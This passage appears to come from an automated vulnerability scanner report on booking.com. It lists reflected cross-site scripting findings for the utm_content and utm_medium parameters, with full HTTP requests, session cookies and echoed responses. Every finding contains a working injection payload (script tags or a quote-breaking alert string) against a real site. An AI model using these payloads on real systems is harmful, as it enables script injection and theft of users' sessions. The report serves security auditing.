S5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:18 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9ExiypSN47xhvNURH5lOoO2jYozF4TSENjhXmBYWLLThEgMiQg1VvlAS4VLQyKpzIrSdNm0QV01D03KxQa4QSro9mMMn%2FElatjVJLkrmmJyAxqwk%2FKhyt936aftC1xLLWK2wICr6zLSiMa9%2FZ%2BeMeuIDP0pdL4NKYNlLD4nPQjKNZAjZmlmvGnlWcQhWjLfmSYFxi0FNlQkxLjau7efhEuuPqRsYQGaCba7mFaluu9j%2BgonYazJNlJHmpRa3gl2g07qvK93ZmKQqAV2bbJdUkmOESMhXPs4KmkhvCSxOdXCuPu2QJ7G%2F4yIi3qjSfG1b8Ntcak%2FlYoUioZ3XijOpGu1dUqDFBnSsWuD8EGVhnsybBlBBggpFSG32jmXD7mz0bp1Kh52E68wZwr9n%2BeX5ItiA9w6Wx0n1gsF9SQ52VM8QiIYN4kdDiixqGwTclU2G6oZeZZVYoMOpyp4vEGSle5bQUtTEl%2BiThbSbT9J7hxsMA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:19 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ranslation';
var transl_undo = 'undo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr27066'-alert(1)-'d20d72902ca;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.gr
...[SNIP]...
4.187. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d7f9"><script>alert(1)</script>995cb4fd7af was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr6d7f9"><script>alert(1)</script>995cb4fd7af&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUXdxg7pYYlMod8pxwXwXemRiCR%2FpP5P0BdBHUEcoqOr8OeCVCbcjwM4wWc3i3O3pAxy6qJC3X46sH7wfV3ds%2FYB3AbEQ%2BczeV6h8UE6Payuz4sBJbSKEktTExBBAezE6%2FaYGKn7YSGFnw%2B7T1OUQp8hkrjg1MQEOGEgtEuX8EO2MlXbBVTBp6oerTo5oyvYt31y9B5%2FT6hI8XLTKADNGdgpw0FMPmD9BlVmvx5tfuyXIDkCAjXVMMM2Py1vvORdqSzfLn6iq1MenqtuP2BXjEf5vt3nrB0G852NKzLgLOAn8z5NqI4H0hDCkw1yAaE16Oya%2Bj2Z0J7kHJJewm6sFIYDk%2FGuRyax%2BRQ5xEX4uTofLio48BYrsn3yfV0L0xfY%2B6SrjBAWNoUqMHZJZpKTGE%2BM5i9wzknjFGt2Dtfc5bv9UXspaEfCTWIxr3d%2Bzu1tQZYc1nIv2N8IQJZQDwa2E%2BjOGQLjzas%2Ffqo0ycnNvK8P17awitXipYuP%2FwJNvDykSTDsvsKOVenI6SpCOS7Ue9mLguJwwoWlTKgGhcE%2FYEMK8m%2B%2BmVQ1xR%2FhP8EQCJ7U0D1tP04%2B0jlbz9KBP%2FhDZxro5WrhOQfs5UPwqj7NrLrDIH1GxiGcAX8oIGH7Bcc9w1Yu6GL2jPnWUxyF2sOukQ4zcWhlpuBNk1R4WFxJd%2Fa9C7xt6ffLpe2i7XGMmZBUCHXVTOLGUdX3t6tkPlrhgs1v%2Ftsq2J5tHwKWUTzTjKDr49B8o7PMaqxDJsCL3SpS1F03NGmBsytBhhWAw0LDc71kTtjkq%2FQvVdTCiJhIXMcKSQ427IFCt1PeiR%2B%2B5%2BbzLg%2BSFbhlgYAhEsvGwtV6%2FALM7lE0eET%2BsKh2I1Ck%2F2THlZXkF%2FFK8A%2BVJ39jtm1R5bgR6CD00N6JvTi%2BKooGsfSSGWgE8ltBIFT7qEfFDVaFIBLx2FlT5bZq6FFwN6xT9v9b%2FQZ7ltcWCu9UaE%2FzPkAIgCkUnSRQh6Np8spT9vbzxxK1z2baWla%2FEdTD6mOinM50ia5Po6HzsUhKcgRgudfx%2Bu4B5NKDWODCAY33KUvL4aAc0NlWcYUjN6glEUkuQ8foBpmIwFhA95jEeVXk499yhPTLLunRa6Zqz2i1gPhKdXT%2Fv5wgfgm11%2FtxWuR24XrHTbmnvWoy4gG4ds7EuqLUBuqlXquWQ544uqeNqUZ24Ymcho%2FrfcHL5oqSQz6lidU%2BHMpG%2FAkKzTLiMe6TtE%2BPAGJ3izI8xRXnCouJfS%2BWr8hHkOUiPPXfZ1PPAXR7Np2ry47WyL5kqJxyia4XGq%2B6okw70cT9AMxPA3vk3UzGXxUGlHr4ICH7kLqnagj4%2FpcN5J9hA3k%2B0PNGyvHSvJJ9Wilye0U7CQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:10 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232637
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr6d7f9"><script>alert(1)</script>995cb4fd7af;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...
4.188. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b58"><script>alert(1)</script>a34ab4a00ee was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPCd2b58"><script>alert(1)</script>a34ab4a00ee&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:57 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsbPvS5ojHmQr70PAdqhFOg79M%2FXdCP0xZ5DipU50RpXgxeAnF1TiTTolIzWwjg7rBK8WJqlw5Yd4FENZjj8wStoMAkFlj5GYE1Q%2BgYjz0B8WA9StN73sN1qdioJKWF8GJWZmSa9d%2BksZEGUmV386H%2Bu0GljDzoU4JV7ZgMsHErl9%2BJz15sD2xG73flzHTw5ZrbiVWwCPM6rjjsxyeIXn3%2FsVA39CpSHrujSaKCziNNvN4sBmgxjz%2B2rTI98zJrgba%2FRso5wMqjBp5UjCiEmDkM3VRI5Y4yay0xfLw4CJSRi1jyPBxK9ONakdiaAixiicye1ntV%2FCf8x0JUjtpmyD3Lct1RPliovhrzLj397QHQmWC9AY8CKpmBgC66s%2B%2F%2BXm8zxTrflvoUx7wQCzo6frqjccG2rFB9XslAiNjuAigUaNSFRZLqX74bxfY4lB634h2GnM%2BLb0cLXb6o42NeNY83q3XwSHVHvh1Ow8TTdHkisQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:57 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232637
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPCd2b58"><script>alert(1)</script>a34ab4a00ee;utm_source=tripad;utm_term=hotel-59554" />
...[SNIP]...
4.189. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd3ac'-alert(1)-'e975783ca10 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPCfd3ac'-alert(1)-'e975783ca10&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:05 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGdtgREHFMYP9KL%2BXWDp4eXWLKqDT4JHK4Ck5t9jXCZSfgs8iZ0zc4fI%2FNmoyKuXU%2F74EgzaV72KBAwDEbn9K7SqcpEXhY0l1KJih5E2TOjss6weHL6zvPdgpsLLsf1oG%2BH7TzGNYU4bNvX1GP8SiLhTA%2FvdnRlJXj2q0%2FBKEyhlglZdav2FlTPKnBneyCmsuM36VOCkVAn5L2CkKQ1vOz1okhGPaUihOuFhSIzlj9Arejb62RiNeghkIEoeTA%2BgIdU4HfXEzFoQqkNfkE15VQpyDqYIaEjbaDqet4733cA3Z6Hq1c44TurbwalX%2BDTE4tp8U8NsDBuoTekaJj9Ek05Gb%2FrOAFOBOsT1niC1HH8F3Wcu4MiPLGvPW%2BXojhtsHuqxK6tJJEpM65v5%2FuBa3ahdAnP790KQdF%2FgY3Il%2B1bdrzgf4JiZf2hnnxm661d40W8AuxjF9%2BKprTgXAp%2B75A7JEY01wZYHFAldpGQ6d1dFpLCcx2tpjO2AazPLocxB%2BeW0PjQnekdA%2FPnRj%2FHNQs9d4w1NGpq7OCx9QAgYsm3eBU4WSkGUPKYJmcKeaj3eHs%2FVm%2BE8xb0um%2BlFRWOv8oyfA3bHI9vCkDY5cdU%2BTG1sjb802fhPCmSN8N55QS0fpgfp13E%2F%2FIYjh64GmXW%2FdcpPauCfyGFKnGT2cTV9exDpFLUDUcsR2sTp6MNzZz%2BDO13KFrgLHKvZbkDIXd8m4Nj51Yvwp1s3R15BXNpMqXuHhV60gbt1EKpTsGv%2B3tw%2BDwIMv6oz7U%2BvhS%2BM9FWIkhbMpKUu6VhApOl7hpKM5cO3%2BGkU2B%2FtRQaGLwTkrkgnxYkXAXjau8InPVw8U4XbGejs0fE7kJDcJ%2F%2F526LouDz9Gat1FmOBJL2iruSHxlAjOeh6h5LzemoJMMnSRaX5bEtQgZ%2B1QMvCz0Nzf9INX6A8Lj9bpUcFOQUN%2FJajA8NXYHxUXOmmICCPPXw7FxLrattzOT%2B3us0oDHTk14DShhJqHWmpbKWzETgCQWsTgAnzXswBrLGecDvc5%2FKF2GxA3E7CT1whPVtdpnCPsBTVaAATFZaQYnEV9w8m4bwXDQJZa0fwzi6l46ODvQFtBGMlsgxN%2BLu1wljdU0IxQWhX5i8H3K5B17j6GX7yUJc4ar7qNa0BIhdbGKmewuGcXaz0zb%2FNLNGhDCn8OgpZlmsv7rzYUYdEf71dccc%2BwkHB4AK2e0xwwrSOwFhSR75c95g9tMvJM59Y%2FLOh1Fdc2oBpw6afdT%2FlKNJu%2BVbYPpl6Ru38TJSEaXabozn9BXOMVN%2BtDjlKL8APukxa%2FVhc8cOOJkbN3BcjoccYZhMpMqIegFODrUDC1OfMU%2B6poj58pGs8hkag%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:06 GMT; HTTPOnly
